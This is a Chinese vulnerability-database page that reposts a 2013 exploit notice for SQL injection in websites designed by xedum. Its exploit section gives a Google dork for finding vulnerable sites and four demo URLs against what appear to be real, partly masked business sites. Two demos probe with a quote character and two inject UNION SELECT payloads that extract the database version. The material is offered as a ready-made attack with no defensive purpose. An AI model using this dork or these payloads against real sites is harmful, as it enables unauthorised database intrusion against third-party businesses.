xedum SQL injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044715 漏洞类型
发布时间 2013-07-24 更新时间 2013-07-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013070183
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Exploit Title: xedum  SQL injection
$$
$$ Google Dork: intext:"design by xedum" inurl:"php?id"
$$
$$ Date:           2013/07/24
$$
$$ Exploit Author: Wild Wolves Team
$$
$$ Vendor Homepage: http://www.xedum.com
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Demo1: http://www.paroXditore.it/itinerari.php?id=15%27
$$
$$ Demo2: http://www.caXiaso-ortofrutta.it/patate_curiosita.php?id=7%27
$$
$$ Demo3: http://www.viXserra.it/event.php?id=-19++union+select+1,2,3,4,5,6,version%28%29,8,9,10,11,12--
$$
$$ Demo4: http://www.liXtrading.com/eng/edilizia_prod_details.php?id=-58+union+select+1,version%28%29,3,4--
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Special Greetz : R3veC0der
$$
$$ Designed By Wild Wolf
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$